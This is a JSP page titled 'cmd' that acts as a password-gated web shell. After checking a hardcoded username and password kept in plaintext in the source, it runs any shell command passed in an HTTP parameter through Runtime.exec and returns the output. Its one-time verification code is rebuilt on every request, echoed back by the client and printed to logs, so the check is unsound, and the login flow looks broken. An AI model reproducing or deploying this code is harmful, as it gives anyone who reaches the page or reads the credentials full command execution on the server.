<%@ page import="org.json.JSONObject" %>
<%@ page import="pers.zhc.u.Random" %>
<%@ page import="pers.zhc.u.common.ReadIS" %>
<%@ page import="java.io.InputStream" %>
<%--
  Created by IntelliJ IDEA.
  User: root
  Date: 2020/1/28
  Time: 上午11:46
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8" %>
<html>
<head>
    <title>cmd</title>
    <script src="./js/jQuery.js"></script>
</head>
<body>
<%!
    String vCode;
%>
<%
    String username = request.getParameter("username");
    String password = request.getParameter("password");
    username = username == null ? "" : username;
    password = password == null ? "" : password;
    String cmd = request.getParameter("cmd");
    String v = request.getParameter("v");
    //noinspection IfStatementWithIdenticalBranches
    if (username.equals(Info.username) && password.equals(Info.password)) {
        StringBuilder vSB = new StringBuilder();
        for (int i = 0; i < 100; i++) {
            vSB.append(((char) Random.ran_sc(97, 122)));
        }
        vCode = vSB.toString();
        if (cmd != null) {
            if (!v.equals(vCode)) return;
            JSONObject jsonObject = new JSONObject();
            ServletOutputStream outputStream = response.getOutputStream();
            Runtime runtime = Runtime.getRuntime();
            Process process = runtime.exec(cmd);
            InputStream inputStream = process.getInputStream();
            InputStream errorStream = process.getErrorStream();
            StringBuilder read = new StringBuilder();
            read.append(">>> ").append(cmd).append('\n');
            new ReadIS(inputStream).read(line -> read.append(line).append('\n'));
            new ReadIS(errorStream).read(line -> read.append(line).append('\n'));
            try {
                process.waitFor();
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
            int exitValue = process.exitValue();
            read.append("<<< exit: ").append(exitValue);
            jsonObject.put("read", read.toString());
            String r = jsonObject.toString();
            byte[] rBytes = r.getBytes();
            response.setContentLength(rBytes.length);
            response.setContentType("application/json");
            outputStream.write(rBytes);
            outputStream.flush();
            outputStream.close();
            return;
        }
%>
<script>
    function cmdSubmit(d, o) {
        let cmd = d.value;
        d.value = "";
        $.ajax({
            responseType: "json",
            url: "",
            method: "POST",
            type: "POST",
            success: (data) => {
                console.log("success!");
                let r = data.read;
                o.value += r + "-----------------\n";
                o.scrollTop = o.scrollHeight;
            },
            error: (data) => {
                console.log("error: " + data);
                o.value += "error: " + data + "-----------------\n";
                o.scrollTop = o.scrollHeight;
            },
            async: true,
            data: {
                cmd: cmd,
                v: "<%
                System.out.println("v = " + v);
                System.out.println("vCode = " + vCode);
                out.print(v);
                %>"
            }
        });
    }
</script>
<form action="javascript:">
    <label for="cmd"></label><input type="text" name="cmd" id="cmd">
    <input type="submit" name="" id="cmd_submit"
           onclick="cmdSubmit(document.getElementById('cmd'), document.getElementById('result'));">
</form>
<label for="result"></label><textarea name="" id="result" cols="50" rows="30"></textarea>
<%
} else {
%>
<form action="" method="post">
    username: <label for="username"></label><input type="text" name="username" id="username"><br/>
    password: <label for="password"></label><input type="password" name="password" id="password"><br/>
    <input type="submit" name="submit" id="submit">
</form>
<%
    }
%>
</body>
</html>
<%!
    static class Info {
        static String username = "zhc";
        static String password = "dnbdyyx";
    }
%>